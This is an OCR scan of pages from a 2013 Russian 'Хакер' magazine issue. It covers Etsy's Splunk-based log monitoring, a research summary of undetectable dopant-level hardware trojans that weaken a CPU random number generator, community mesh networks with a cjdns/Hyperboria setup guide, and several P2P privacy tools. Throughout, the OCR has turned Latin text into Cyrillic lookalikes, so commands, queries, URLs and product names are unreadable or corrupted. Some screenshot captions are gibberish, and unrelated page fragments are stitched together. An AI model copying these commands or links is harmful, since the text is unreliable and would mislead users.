некоторых событий, и этим нехитрым приемом 
многие активно пользуются. В том числе в ин- 
формационной безопасности. 



ѴАС И ЕТ5Ѵ 

Например, в компании Еізу анализ большого 
количества данных буквально возведен в культ. 
На недавно прошедшей конференции Уас один 
из сотрудников компании рассказывал ( іесб. 



ѵапРех.ги/еѵеп 1 : 5 /ѵас/ 2013 / 1 :аІкзЛ 133 ). как они 

перемалывают огромное количество логов 
и благодаря различным метрикам серьезно уси- 
ливают защищенность веб-приложения. 

Логика простая. Любой компании необходи- 
мо хранить множество логов на случай рассле- 
дования инцидентов. Так почему бы эти самые 
данные не использовать и для проактивной за- 
щиты? Если безопасность приложения напря- 
мую зависит от того, насколько хорошо ты его 
знаешь, то без глубокого мониторинга о безо- 
пасности не может идти и речи. Парни мониторят 
буквально все, включая нетипичные для многих 
компаний метрики: 

* количество сбросов паролей в единицу вре- 
мени; 

* расхождение СЗНР-токенов в единицу вре- 
мени; 

* удачный/неудачный логин; 

* ошибки при вводе ОТР-ключа при включен- 
ной двухфакторной авторизации и так далее. 



ВІС ВАТА БЕЗ КЛАСТЕРА 

Для этого даже специально построен Набоор- 
кластер, но ведь можно обойтись и без него. 
Для агрегации, индексирования и анализа логов 
есть прекрасный проект Зріипк (’ѵѵѵѵѵ.зріипк. 
сот). В двух словах — это Ооодіе, но для логов. 
Благодаря сложной математике внутри, он умеет 
так парсить и хранить логи (впрочем, как и дру- 
гие данные), что ты в любой момент можешь сде- 
лать очень сложный запрос и... получить ответ. 
Например, попросить Зріипк показать количе- 



ство сбросов паролей с одного ІР-адреса за 30 
минут: 



5оигсе="/ѵаг/ыим/ассе55 . Іо^" гедие5~Е_» 
и г 1/ -Рог^оі: ра ззыогсі . рЬр И 1: ~Ер те! ИосІ 
Р0 5Т | бгапз ас біоп гедиез1:_ір | ыііеге 
еуепбсоипі > 10 | ІаЬІе ге диезб і р. <-■ 
еѵепіісоипі: зог! -еѵепіісоипі: 



Для запросов используется понятный язык, 
основанный на принципе ІІІМІХ рірез (результат 
одной операции передается на вход следую- 
щей), и обращаться с ним проще простого. 

Парни из Зріипк предлагают хранить все. Лю- 
бые логи событий, логи веб-сервера, логи оши- 
бок, лог обращений к АРІ, логи ЭИЗ — весь этот 
массив данных складывать в Зріипк. Если не за- 
гружать более 500 Мб данных в месяц, то исполь- 
зовать его можно совершенно бесплатно. Доста- 
точно лишь установить на все машины, откуда 
нужно собирать логи, специальные программы- 
форвардеры, после чего данные с хостов будут 
загружаться через АРІ и аккумулироваться в базе 
Зріипк. 

Результат любого поискового запроса мож- 
но визуализировать на ЭазІіЬоагсі’е, что и де- 
лают ребята из ЕЩу. На ОазбЬоагсІ можно вы- 
водить все, что угодно, например показывать 
количество запросов, когда вернул 500+ ошибку 
при обращении клиента к определенной части 
сайта (скажем, иві^Ѵ^ор/*"}. 

Благодаря таким запросам можно делать 
сложную аналитику для проактивных действий. 
Например, Еізу детектит фишинговые атаки, 
основываясь на данных веб-сервера, в реаль- 
ном времени реагирует на ХЗЗ-атаки. На экра- 
не всегда отображаются графики с ключевыми 
метриками, чтобы иметь возможность быстро 
реагировать (хотя, естественно, не обходится 
и без стандартных алертов по етаіІ/ЗМЗ). 

КТО БЫ МОГ ПОДУ МАТЬ 

Кстати, ты, как и я, наверное, не слышал о таком 
проекте. Это неудивительно: несмотря на боль- 
шие масштабы, этот екоммерс-проект специа- 
лизируется на продаже винтажных вещей :). Тем 
интереснее, что в компании так серьезно под- 
ходят к безопасности и стараются использовать 
даже такие технологичные приемы. И тем по- 
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В основе отчетов л ежит запрос к базе данных 

казательнее пример, что необязательно делать 
обвязку для большого адронного коллайдера, 
чтобы применять в своей компании современ- 
ные технологии. Все зависит только от сотруд- 
ников. ІХІ 
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АППАРАТНЫЕ ТРОЯНЫ 
В КОМПЬЮТЕРНЫХ ПРОЦЕССОРАХ 



ЧТО ЭТО ТАКОЕ 

В последние годы тема аппаратных троянов привлекла внима- 
ние и правительств разных стран, и производителей, и научно- 
го сообщества, Но до сих пор все разговоры носят преимуще- 
ственно теоретический характер. Никто не знает, как эти трояны 
могут выглядеть на практике и насколько трудно их внедрить 
в микросхему. 

Группа исследователей из США, Нидерландов, Швейца- 
рии и Германии опубликовала научную работу ( реоріе.иппазз. 
еби/дЬескег/ВескегСНезІЗ.рсШ . в которой описывается ис- 
ключительно скрытный метод внедрения троянов в микросхе- 
му — так, что вредоносные изменения невозможно обнаружить 
ни под микроскопом, ни с помощью функциональных тестов, 
ни другими известными методами, в том числе сравнением 
со стандартными образцами. 

ЗАЧЕМ ЭТО НУЖНО 

Скрытую функциональность микросхем можно использовать 
в различных целях. Например, можно скомпрометировать ге- 
нератор псевдослучайных чисел в центральном процессоре 
ПК (см. пример ниже), тем самым ослабляя криптографическую 
защиту. Генератор псевдослучайных чисел — это ключевой эле- 
мент любой криптографической системы, его корректная рабо- 
та имеет важнейшее значение для общей безопасности. 

Теоретически с помощью бэкдора можно добавить в ми- 
кросхему любую постороннюю функциональность. Это мо- 
жет представлять реальную угрозу, если чипы используются 
на предприятиях военно-промышленного комплекса или в во- 
енной технике. Можно предположить, что в случае военных 
действий враг получает возможность вывести из строя компью- 
терное оборудование противника, и победа ему практически 
гарантирована. 

В современном глобализированном мире большая часть 
всех используемых микросхем изготовляется на заводах 
всего лишь нескольких компаний. Это повышает вероятность 
внедрения троянов. Кстати, в 2005 году научный комитет 
при министерстве обороны США выражал озабоченность тем 
фактом, что армия все больше использует компьютерные ми- 
кросхемы заграничного (китайского) производства. Очевидно, 



что эти опасения уже тогда могли иметь под собой реальные 
основания. 

Даже если микросхемы изготавливаются на доверенном за- 
воде у доверенной компании, все равно есть риск внедрения 
троянов на одном из этапов производства. По мнению авторов 
научной работы, угроза появления скомпрометированных чи- 
пов будет только возрастать. 

КАК ЭТО РАБОТАЕТ 

Метод заключается в изменении полярности допанта на опре- 
деленных участках транзистора таким образом, чтобы пред- 
сказуемо изменить свойства транзистора. Допант — моди- 
фицирующая добавка, повышающая удельную электрическую 
проводимость материала, стандартная часть процесса по из- 
готовлению микросхем. В данном случае в процессе произ- 
водства некто может изменить характеристики техпроцесса 
нужным ему образом. 

Исследователи в своей работе приводят два примера, 
как такая атака может работать на практике. Один из этих 
примеров — модификация модуля ГПСЧ в процессорах Іпіеі 
Іѵу Вгісіде. 

ГПСЧ в процессоре ІпТеІ !ѵу Вгісіде генерирует 128-битные 
псевдослучайные числа, он состоит из двух частей: источника 
энтропии и системы цифровой постобработки. Один из моду- 
лей постобработки выдает результат на основе неизвестных 
128-битных случайных чисел от источника энтропии и неизвест- 
ных 128-битных чисел К, которые вычисляются в процессе об- 
работки. Задача злоумышленника — изменить определенное 
количество из 128 регистров К на постоянные значения. Таким 
образом, злоумышленник снижает вероятность угадать случай- 
ное число с 1/2 128 до 1/2", где п — количество немодифициро- 
ванных регистров К. 

Если мы не знаем, сколько изменено регистров и какие 
именно, посторонний наблюдатель не способен определить 
неслучайность генерируемого потока битов. Ученые показа- 
ли, что, например, при п = 32 внешние статистические тесты 
зарегистрируют хороший поток случайных чисел, а модуль 
с трояном даже пройдет внутренний тест ЬиМТ-іп зеІМезі (ВІЗТ), 
встроенный в микросхему для самодиагностики. НЕ 
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Схема транзистора 
с указанием части, 
на которой бьЕла изме- 
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Оригинальный и мо- 
дифицированный 
элементы, во втором 
случае сток транзисто- 
ра выдает постоянное 
напряжение ѴйО 




ДД 8 



шим щ амж 









НПНІ 



Тгоіап агеа 

























ХАКЕР П /178/2013 





Как пользователи 
могут исправить 
главные 
проблемы 
интернета 
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Всем нам многое не нравится в том, как развивается современный интернет. 
Олигополизация крупными игроками. Государственное вмешательство. 
Цифровое неравенство, означающее, что интернет по-прежнему есть не везде 
и не всегда он достаточно стабильный и быстрый. Но решить эту проблему 



могут только сами пользователи 



это же интернет. 



Конечно, проблема, которая сейчас заботит всех, — это деано- 
нимизация, цензура, нарушения приватности. Не стану в оче- 
редной раз мозолить тебе глаза всеми этими аббревиатурами. 
Ну знаешь, Р#@!$, І\І@#, 3@#$ или же наш, родной С”№%. Буду 
на этих страницах бороться с ними их же методами. Ведь я это 
могу. 

Но все чаще это похоже на коллективное помутнение рас- 
судка и временный хаос, а не на глобальный заговор. Тѵѵгйег 
блокирует неонацистов или троллей -шовинистов, но дает 
высказаться террористам? Місгозо^ ухитряется направить 
в Ѳоодіе требование исключить из выдачи собственные ре- 
сурсы? Телеканал НВО на полном серьезе подает аналогичную 
жалобу на плеер ѴІ_С? Крупнейшую технологическую площадку 
в Рунете блокируют за один-единственный коммент? 

Выглядит грустно. Иногда все-таки смешно. Ну и все чаще 
попросту пугающе. Но это не единственная проблема с интер- 
нетом. Я вряд ли удивлю тебя тем, что на земле есть места, 
в которых коннекта нет не потому, что чиновникам вдруг стало 
стремно или в дата-центре Соодіе уборщица отличилась. Ну вот 
просто нет. Такое бывает не только в Африке, как ни странно. 

Думаешь, речь пойдет о Тог, І2Р и РгеепеЕ? Увы, все не так 
просто. Да, эти технологии работают и поддерживаются круп- 
ными сообществами. Но решают ли они проблему? Нет, ведь 
это по-прежнему оверлей поверх существующего интернета. 
Физически это работает в каналах столь ненавистных тебе про- 
вайдеров, контролируемых государством и другими темными 
силами. Итак, что же делать? Ответ пытаются дать разработчи- 
ки проектов меш-сетей. 



Речь идет о ячеистых топологиях, состоящих из полностью 
равноправных узлов и поддерживающих возможность постро- 
ения произвольных маршрутов. Если одна нода откажется 
принимать информацию, ее примет другая. Все это дает очень 
высокую надежность и невозможность заблокировать распро- 
странение информации. 

Меш-сети могут как быть изолированными от интернета, 
так и работать в режиме оверлея. Очевидно, что если интернет 
не используется, то нужны какие-то другие физические каналы 
для того, чтобы меш-сети могли быть глобальными. А для этого 
нужны большие ресурсы, время и инициатива пользователей. 
Глобальный интерес к свободе Сети возник сравнительно не- 
давно, поэтому для начала более показательным будет пример 
меш-сетей, создававшихся для проведения интернета в уда- 
ленные регионы. 



ИНТЕРНЕТ АМЕРИКИ 



МАКСИМАЛЬНАЯ 
ДОЛЯ РЫНКА, 
КОТОРУЮ МЕШ- 
СЕТЯМ УДАСТСЯ 
ОТНЯТЬ У ТРА- 
ДИЦИОННЫХ 
ИНТЕРНЕТ-ПРО- 
ВАЙДЕРОВ, 

ПО МНЕНИЮ ОС- 
НОВАТЕЛЯ 61ЛРІ 
РАМОНА РОКА. 




Правительство США активно финансирует разработку продуктов для быстрого раз- 
вертывания меш-сетей, как компьютерных, так и сотовых. Такие решения должны обе- 
спечить связью оппозиционных деятелей в диктаторских режимах. Проект сравнивают 
с похожими инициативами США в области радио, вроде радиостанции «Голос Амери- 
ки» (источник: ТІте МеѵѵѴогкТітез). 
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АТНЕЫЗ ѴѴІРЕЬЕЗЗ 
МЕТКОРОиТДЫ ЫЕТѴѴОВК 

Проект греческой меш-сети на- 
чался в 2003 году. Как и в случае 
с ОиіТі, целью афинян было обе- 
спечить высокоскоростную сеть. 

К тому времени как услуги по ши- 
рокополосному подключению пе- 
рестали быть редкостью в Афинах, 
АѴѴМЫ успел добраться до более 
удаленных регионов Греции и даже 
соединиться с узлом в Словении. 
Всего в проекте более тысячи 
«суперузлов», объединяющих 
примерно три тысячи пользова- 
телей с помощью маршрутизации 
по протоколам ВОР и ОЗІ_П. 



СШРІ 

Самая крупная меш-сеть в мире развернута в Каталонии и Валенсии (регио- 
ны в Испании) и состоит из 22 тысяч узлов. Проект зародился в начале нуле- 
вых, когда местные жители устали ждать появления в регионе нормального 
интернет-провайдера. С тех пор сеть развивается на общественных началах 
и подключение к ОиіТі доступно совершенно бесплатно. Если упрощенно, 
то выглядит все так: есть условные единицы — «острова». Каждый остров — 
это меш-сеть, объединяющая пользователей района, муниципалитета или 
города. Для подключения используются ѴѴі-Рі-роутеры с видоизмененной 
прошивкой на базе ОО-ѴѴРТ Связь между островами обеспечивается 
при помощи ѴРЫ-серверов или прокси-серверов на ЗццісІ, Эти же серверы 
дают пользователям ОиіТі доступ в интернет. Соответственно, если сервер 
падает, сеть внутри острова продолжает работать, но доступ к другим остро- 
вам и интернету прекращается. Конкретная скорость сети и стабильность 
прокси-серверов в каждом случае разная — у многих скорость не превы- 
шает и одного мегабита, но во многих районах (особенно в горах) это по- 

прежнему лучший способ выйти в интернет. 



ѴѴА5АВІ N ЕТ 

Районная сеть в Сент-Луисе (США). 

Покрывает территорию вокруг 
одной улицы (СНегокее Зігееі, если 
быть точным). Базовый интернет 
(до одного мегабита в секунду) 
предоставляется бесплатно, 
более быстрый (3-5 Мбит) — 
за 10 долларов в месяц, а юриди- 
ческим лицам услуги предостав- 
ляются за 20 долларов в месяц. 
Для маршрутизации используется 
протокол 0!_5Н. Аналогичные сети 
существуют и во многих других 
городах и штатах. 











Соѵег Зіогу 
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Интересно посмотреть, что все указанные регионы — это 
не страны третьего мира. Проблемы с доступом к интернету 
существуют в удаленных регионах множества стран. И пример 
(Зиііі, АѴѴМЫ и прочих наглядно демонстрирует, что пользовате- 
ли могут не дожидаться вмешательства крупных компаний, они 
вполне могут построить свой собственный интернет. Сейчас 
с теми же проблемами — отсутствием ресурсов, инфраструк- 
туры, необходимостью развивать технологии — сталкиваются 
и сторонники свободного интернета. 

Больше всего внимания сейчас привлекает Рго{ес1: МезЬпеТ 
Проект зародился в недрах ВесІсШ: в 2011 году на фоне разго- 
воров о ЗОРА/РІРА. Участники разработали протокол сісіпз, 
важное отличие которого от В.А.Т.М.А.Ы., ОЗІЯ, ОЗРР и других 
заключается, во-первых, в возможности объединять отдельные 
сети между собой, а во-вторых, в шифровании трафика. 

Участники отмечают, что в текущем виде с]бпз не дает ано- 
нимности. Сейчас можно проследить маршрут, по которому 
идут пакеты, и найти адрес пользователя. Анонимной сеть ста- 
нет только тогда, когда перестанет использовать оверлей. 



К 

Вот так выглядит карта 
узлов НурегЬогіа 

71 

Различные проекты 
пытаются сделать 
готовые аппаратные 
решения для меш- 
сетей. Это, например, 
РігаІеЬох 



ОМЕ ШЕ РЕК СНІЮ ) 



Еще одним примером масштабного внедрения меш-сетей можно считать Опе 
1_арІор Рег СИНЬ. В рамках знаменитого проекта были разработаны дешевые 
компьютеры для детей в странах третьего мира. Одной из важных функций 
ОІ_РС как раз является возможность поднять меш-сеть в классе без примене- 
ния оборудования. Всего было распространено более двух с половиной мил- 
лионов ОІ_РС. 




Однако, поскольку для построения маршрута не использу- 
ется луковичный принцип поиска узлов, С(СІП5 обладает более 
высокой по сравнению с Тог и 12Р скоростью работы. 

Самая большая сеть в проекте называется НурегЬогіа. Ос- 
новная проблема на данный момент — небольшое количество 
узлов, поскольку подключение новых членов происходит по си- 
стеме инвайтов. В долгосрочной перспективе проблемой явля- 
ется отсутствие инфраструктуры, необходимой для того, чтобы 
меш-сеть стала глобальной. И, учитывая то, что сетью занима- 
ется комьюнити без участия муниципальных структур {как это 
было в случае Оиій), телекоммуникационных и интернет-ком- 
паний или любых других внешних сторон, какого-то решения 
для этого вопроса сейчас нет. 

Ргоіесі МезЬпеІ — лишь верхушка айсберга. И даже разра- 
ботчики признают, что не до конца понимают, насколько мас- 
штабируется их детище. Но дело не только в технологиях. До- 
пустим, что 15% мировых интернет- пользователей перейдут 
в такие сети. Сети, в которых нельзя перехватить трафик, нель- 
зя заблокировать распространение информации. Как хорошо 
написали разработчики СгуріозрЬеге, Р2Р-платформы для веб- 
приложений; 

« Можем ли мы защититься от ИЗА? Пришла пора погово- 
рить начистоту. Из всего многообразия проблем, с которыми 
можно столкнуться при разработке криптографической систе- 
мы, ИЗА занимает особое место. Это же огромная государ- 
ственная структура с бесконечными ресурсами, как финансо- 
выми, так и людскими. 

Мы убеждены, что, если ИЗА захочет обойти защиту нашей 
разработки (или любой другой криптографической системы), 
им это удастся. Либо они найдут уязвимости в самой системе, 
либо найдут их на стороне пользователей, например задей- 
ствовав 0 - бау-уязв и мо с ти или просто непропатченные дырки. 

Вот поэтому мы не говорим, что мы защищаем от ИЗА. 
Не думаю, что разработчик любой другой подобной системы 
смог бы гарантировать такое». 

Проблемы могут быть не только технические, но и юриди- 
ческие. Достаточно посмотреть на то, как креативно ФБР ищет 
в Штатах педофилов. Сайты-приманки, фейковые раздачи 
в торрентах, миролюбивые письма с просьбой явиться в по- 
лицию и заплатить «штраф за педофилию». Легко представить 
себе такой сюжет: два агента посылают друг другу в НурегЬогіа 
фильм с детским порно. Выстраивается маршрут, по которому 
файл был доставлен, выявляются задействованные узлы, а их 
владельцев обвиняют в распространении. Бредово, но не так 
уж и нереально. Не впервые. 

Но важный момент заключается в том, что если все эти про- 
блемы не пытаться решать, ничего и не изменится. Тем более 
что поучаствовать в процессе не так уж и сложно. Мы много 
говорили о том, как подключаться к Тог, І2Р, Ргеепеі Давай же 
попробуем разобраться в том, что скоро действительно может 
стать альтернативным интернетом. 
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ПОДКЛЮЧАЕМСЯ К НѴРЕПВОРІА 



Итак, для подключения нам понадобится ЕІМІХ- 
система (ѴѴіпсІоѵѵз на момент написания статьи 
не поддерживалась). Официально поддержива- 
емый способ установки сісіпз — сборка из исход- 
ников. Рассмотрим установку в ОеЬіап/ІІЬипіи. 
Для начала поставим все основные зависимости: 

з ибо арі-^е і іпз іа іі стаке *-> 

Ь и і1б-е55епѣіа1 

Выкачиваем себе репозиторий с ОіШиЬ и пе- 
реключаемся в соответствующую директорию: 

§І1: сіопе Іііірз : //ёіІбиЬ . сот/сзсіеіізіе/ 

С]*бП5.§І1: СІСІПЗ 
сб С 3 б П5 

Собственно сборка: 

./б о 

При успешной сборке в итоге ты увидишь 
фразу Виііб сотріеіеб зиссезз^иііу. Есть инструк- 
ции по установке для АгсбЫпих ( дІ/ВтОЗЬУ ). 
Сепіюо ( аоо.аІ/АІЗОІб ) и 05 X ( доо.аІ/8\л/б2ГО ). 

НАСТРОЙКА 

Проверяем, что есть все необходимое: 
саі^/сіеѵ/пеі/іип 
Если получится такое: 

саі: /беѵ/пеі/іип: Рііе бе5сгір1ог іп «-■ 
Ьаб зіаіе 

значит, все ОК! Если же получил такой ответ: 

саі: /беѵ/пеі/іип : N 0 зисб біе ог <-■ 
бігесТогѵ 

выполни следующие команды: 

$ибо ткбіг /беѵ/пеі: && 

$ибо ткпоб /беѵ/пеіі/іип с 10 200 && 

зибо сіітоб 0666 /беѵ/пеі/іип . 

Попробуй снова выполнить 

саі /беѵ/пеі/іип 

Если в ответ получишь такое: 

саі: /беѵ/пеі/іип: Регтіззіоп бепіеб 

ты, скорее всего, используешь ѴР5 на основе 
платформы ОрепѴ2. Попроси хостера включить 
тебе «туннельный интерфейс» ТІІЫ/ТАР — это 
стандартная штука, они должны знать, как это 
сделать. 



1 . Создай конфигурационный файл: 

іУс^бгоиІе - -§епсопТ >> сзбпоиіе. соп-Р 

Этот файл — твое все! Там твои ключи, ІРѵб- 
адрес, пароли доступа и прочее, и прочее, соот- 
ветственно, он должен быть хорошо защищен. 

Установи права доступа к файлу только 
для себя и помести его, например, в Йоте 

сНтоб 600 сзбпоиіе.соп-р 

тѵ сзбгоиІе.сопТ ~/.сдбгои1зе.соп-Р 

2. Найди пиры. Самый сложный шаг — пока 
сеть в основном работает в оверлейном ре- 
жиме (то есть поверх интернет-соединения), 
для подключения к НурегЬогіа тебе нужно най- 
ти кого-то, кто уже подключен. Можно посмо- 
треть на карте проекта, попросить в ІВС-чатике 
(#с|бпз на сервере ігс.еіп ѳ .от ), попробовать 
спросить на русскоязычном форуме ( сісіпз л у). 
Есть некоторые публичные ноды, но они пло- 
хи тем, что ломают децентрализацию (из-за 
малого количества нод вообще) и сами стано- 
вятся центрами подключения. Можно подклю- 
читься через публичную ноду, а затем найти 
кого-нибудь внутри сети (например, существу- 
ет внутренний сервис микроблогов). 

3. Добавь инфу пира в конфиг. Для подключе- 
ния к пиру тебе потребуется его ІР и порт, па- 
роль и публичный ключ. Обычно все это пере- 
дается в виде 650ГЧ, выглядит примерно так: 

■* , « . / 

! X 

V 

>р * 

і 

* 

*, * 

> ~ ~~ 

Подобную информацию надо вставить в кон- 
фиг в поле соппесІТо 

* 

* 

{ : 

1 



_} 

1 

Либо воспользоваться моим веб- 
интерфейсом (про него чуть дальше). Можно 
добавлять сколько угодно пиров (и чем боль- 




\ѵ\ѵ\ѵ 

В НурегЬогіа уже есть несколько популярных сервисов: 
НуреОѵегТІоѵѵ - клон ЗІаскОѵегПоѵі/: ІіѵоеоѵеіІІсм.сот 
ІІрріі - аналог Веббіі: иоріі.из 
ІІгІсІоиб - файл-хостинг: игісіоиб.пеі 
пеогеіго - МТР-сервер: теаб.пеогеіго.пеі 
гоѵѵз.іо — ОаЬЬег-сервер: гоѵѵб.іо 
Нуребізсизз - СепегаІ Роштз: Ьѵребізсизз.сот 
ЗосіаІ Ыобе- микроблоги: зосіаіпо.бе 
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ше — тем лучше). Если ты хочешь предоста- 
вить кому-то доступ через твою ноду, то дан- 
ные есть в конфиге в комментарии рядом 
с секцией аиібогігебРаззѵі/огбз. Нужно только 
вписать свой внешний ІР-адрес. В секции 
аиібогігебРаззѵѵогбз можно добавлять раз- 
личные пароли для разных людей, а в 650М- 
информацию о пирах в соппесІТо можно до- 
бавлять любые поля (например, информацию 
о географическом местоположении ноды). 

4. Проверь открытые порты! После подключе- 
ния к сети твоя нода получит белый статиче- 
ский ІРѵб-адрес (впрочем, доступный только 
из НурегЬогіа), поэтому важно проверить, нет 
ли неизвестных тебе открытых портов, к кото- 
рым мог бы кто-то подключиться. 

5. Поехали! 

зибо . /сібгоиіе < ~ / . сібгоиіе. сопТ 

Если нужно записывать логи: 

зибо . /с^бгоиіе < ~/.с]бгои1е.сопб *-> 

> с ібг оиіе.іор 



Логи можно смотреть «в прямом эфире» через 
мою веб-админку. Чтобы выключить с]бпз: 

зибо кіііаіі с^бгоиіе 

Для запуска с)с!пз не от рута есть инструкция. 

Итак, ты в сети. Попробуй зайти на какой-ни- 
будь НурегЬогіа-сервис. Например, есть аналог 
Твиттера ( іаіпо ). При первом старте может 
потребоваться несколько минут на построение 
маршрутов. 

СБОРКА ОРЕ N ѴѴНТ С ПОДДЕРЖКОЙ 
СбО№ 

Если хочется установить сісіпз на роутер, придет- 
ся повозиться немного дольше. Установка самого 
ОрепѴѴВТ — отдельная тема, и она хорошо рас- 
писана на страницах самого проекта. Главное — 
убедиться, что роутер указан в списке поддер- 
живаемых моделей ( \ллкі.орепѵѵг1огдЛоІі/з1агі ). 
Для того чтобы роутер заработал с сісіпз, нужно 
достать исходники ОрепѴѴВТ и собрать их, указав 
при сборке, что необходимо добавить сісіпз. Все 
это расписано в соответствующей инструкции 
на русском ( I іи! ІЯ }. Могу только добавить, 
что не стоит пытаться собирать прошивку на са- 
мом роутере — конечно, это надо делать на нор- 
мальном компе, а потом уже скомпилированную 
прошивку устанавливать на роутер. 

На моем Ые^деаг №N0133600 оно завелось, 
но через неделю роутер стал жутко тупить (даже 
при выключенном сісіпз), пришлось снести 
ОрепѴѴВТ и поставить обратно ОО-ѴѴВТ. Также 
в вики проекта есть инструкции для установки 
на ВазрЬеггу РІ ( доо.дІ/ХоП802 ). 




Соѵег Зіогу 
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В то время как энтузиасты пытаются сделать собственный интернет, связав 
разрозненные островки свободы, сообщество старается решить проблему 
в краткосрочной перспективе. Децентрализация, криптография, реегіо реег — 
решения появляются почти в каждой сфере. 




віітснадс 




Еіір ЗеіЕіп$з Неір 

1^1 [р.Ьои і ^ ЬегчсІ 



I 5епі 



ѴйигІ 



• Ьоок 



г вінкіія ѵ Ыейлюгк 




Ргопі 

То: 



* іегяі со ліеоі ічО'е ьрееіііс, реаріе 

Вголгісл^ т еодуогге иФо і? *иЬ«пІ№<1 то уоуг 
Р&гьйПдІ: ст 



вМ’2п] іаВ5 Ы Сбн Е5і^ РМо М іУ/дМ сЕі А^ѵв4Хт ѵ 
ЬиЬ]ег.;: Ь&ГОП іріигіі іІЫйг 5Іі алій 



ьоай Ггагг Ш«і ЬшЛ 



Меяні^е: СгуртоегарЬіа (Огаме ирщпб^ 'оссикит' И ураірау 'нтіЬеге") еят эг? зоегиіддие зспЬепйі ет іпгегргйагкіі питіе 

ьеггеи, СгурІи^гарМі иТиІІГШ таіЬёЛіЙіСА гаІШпіЬиі „Ш гіилЕІа йѢ^игаПСІа. пе аЕІіК, еа Ог5 І й ( шІ ГПІЬіа ыПЬ 
ШІіыіта рбі сгурюнгзрИіа ген гпПіЕагі аЛзТгэіеЁетзСа егтаяйата ттепйа.| 



5еп^ 



V 



ВІТМЕЗЗАСЕ 

ШрзѴ/ЬіІтеззаае.ога/ѵѵікі/РАО 

Віітеззаде — система обмена сообщениями, использующая принци- 
пы децентрализованной зашифрованной коммуникации в духе Віісоіп. 
Адрес пользователя — хеш, рассчитывается на основе потока, публичных 
ключей и версии. Адреса и ключи пользователя, как и в Віісоіп, хранят- 
ся в локальном файле. Для того чтобы начать сессию с пользователем, 
нужно передать ему свой адрес. К сообщениям можно прикладывать 
файлы размером до 180 Мб, но разработчик предлагает в будущем за- 
действовать ВіІТоггепі. Также доступно что-то вроде микроблога (функ- 
ция Ьгоасісазі, односторонний обмен сообщениями с несколькими под- 
писчиками) и чата. Доступны клиенты для ѴѴіпсіоѵуз, Мае и І_іпих. 



ѵ дгау 



сіеѵеіорегз 1 (е5( ѵешоп, по( Тог риЫіс изе 



1 і і в і 




ж 



ѣ 



тох 






АсІ<3 РгіепсІ 



ІОХ.ІГ 



Тох — проект, ставящий целью создать Р2Р альтернативу Зкуре. Для шиф- 
рования используется библиотека №С! (№1\л/огк апб Сгуріодгарбу 
ЫЬгагу, не путать с Маііѵе СІіепі от Ооодіе) — та же, что в сісіпз. Идентифи- 
катор пользователя — случайная строка из 32 символов, для адресации 
используется ОНТ. Сейчас реализован протокол обмена сообщениями, 
но в планах есть аудио- и видеочат, передача файлов и все прочие атри- 
буты Зкуре. Однако на данный момент есть только очень скупые графи- 
ческие и консольные клиенты и плагин для популярного мессенджера 
Рісідіп. В общем, проект еще сырой, но и начали работу над ним позже, 
чем над Віітеззаде. 













Магк ТЬемпівзеп 

Аге уоу ^аісГііпд ІПе Ііѵе гесолпрііатіоп? 




Аагоп Рогзапсіег 

ѴѴе зГюиІй а(50 ітрозе а Ііті! о г йіе ІепдіГі о? а роз!. МауЬе Зо'з НТТР 
зегѵѳг !іаз ап іп!егпаІ Іілпіг оп (Не зіге о! а Р05Т Ьооу. 




ѵоиЕ 




Аагоп Рогзапсіег 

ІРеа: ѵѵе Іе! изегз зЕаг" ровЬ ІІпеу Ііке. ѴУе в!оге !Ііѳ Ііві о? з!аггеР роз!з 



ѵоіе.сс 

Ѵоіе — социальная сеть в браузере. Для работы не нужен центральный 
сервер, все происходит благодаря протоколу ВіІТоггепіЗупс. Само прило- 
жение написано на языке Со и фреймворке ЕтЬег.із. Чтобы все заработа- 
ло, нужно поставить приложение для командной строки (поддерживаются 
все платформы) и подключиться к нему в браузере. Чтобы подключиться 
к другим пользователям, нужно поставить клиент ВТЗупс. Фактически, 
чтобы зафоловить кого-то, нужно добавить его секрет в ВТЗупс'е (напри- 
мер, ВА32ХкВВНХМ\Л/МЕССЗА^ММРС)3222СЯ7К). Можно публиковать 
текст и изображения, за аватарки отвечает популярный сервис Сгаѵаіаг. 
Конечно, идея не слишком масштабируемая, но начинание неплохое. 





РЕЕВСЕИ4 



Г 




ВапсімісШі Тгапзіѳг 



Регсеіѵесі ! гладе І_оасІ Тішез 



ЯГіу 



* 0ппсІшісІ1*і сов* <$0 12 рет С-0) Ьпзм* оп Агппгіэп Сіоигіітгті "ГгвгтаЯег іхгГ овд! іп Инге ой Бйніт 



РеегСРЫ несколько выбивается из списка, поскольку предназначен 
не для обеспечения приватности или анонимности, а для того, чтобы 
снизить нагрузку на веб-сайты в случае внезапных скачков популярно- 
сти. Фактически это Р2Р-решение для хранения статики, когда посетите- 
ли запрашивают изображения и другие файлы не с сервера, а от других 
посетителей, которые в данный момент находятся на сайте. По словам 
разработчиков, это может на 90% снизить трафик. Также примечатель- 
но, что это просто подключаемая библиотека на ЗаѵаЗсгірІ, поэтому 
ее очень легко задействовать, а пользователям не потребуется ничего 
устанавливать. 
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таіірііс 




То: 






Іап М&ібоп 



Ргіегчіэ, Рііт, Ратііу 
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Зепі ® ос: 

БиЪіесІ: Ѵо Согпрагіге. Ноѵѵз і( доіпд? 

ѴѴогк Етайз 



Оссиру ріісбіогк идМ зетюЕісз ііпдегйіасііе Везроке ТгиГРаиі зігееі агі ЬиіеЬег вагіонаі оідагис здиій Ігіипйѳгсаіз 
Ратііу Бапкзу ЗсЫііИг Аизііл Магіа 5 № , ад агіізап ѴѴ@§ Апгіегзоп КеШуеб эгіізап РосПапР Магіа тііглЫесоге. Аггшгісап 

арраіеі )еап згюгіз депігіту Еспо Ра г к сагйідап. закѵіа э ѵѵоіі тооп Теггу Нігішеідол си V ти&іасгю сгау ттдет- 
віасРе бсхіагй Сідіг піазіег сіеапзе тедд'.пдз Егеедап Іоіи уігаі тизіасбе (агт-іо-іаОіе іоііг Іоко Гшіѵѳііса іар 
ВйПкІПд кЁэуЕаг ріекЗей ЫЕегаІІу ІйизРегі Есію Ра г к Ггевдап Майка азуттѳЕгісаІ В-ЫІ ОІУ агііаап Ійіи РВН Ьап|о рог к ЬеІІу 
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Проект по созданию безопасного почтового сервера. Защита почты соз- 
дается вокруг встроенной поддержки ОрепРОР. Понятно, что настройка 
РОР не такая уж и непосильная задача. Однако разработчики Маіірііе (как 
и полагается, скандинавы) хотят сделать готовое решение, в котором 
помимо поддержки РОР и возможности работы в сети Тог есть нормаль- 
ный интерфейс и удобный функционал. Проект собрал 160 тысяч дол- 
ларов на площадке Іпбіедодо (аналог КіскзіаПег). И хотя ни одного ре- 
лиза не было, проекту уже удалось «прогреметь». Дело в том, что после 
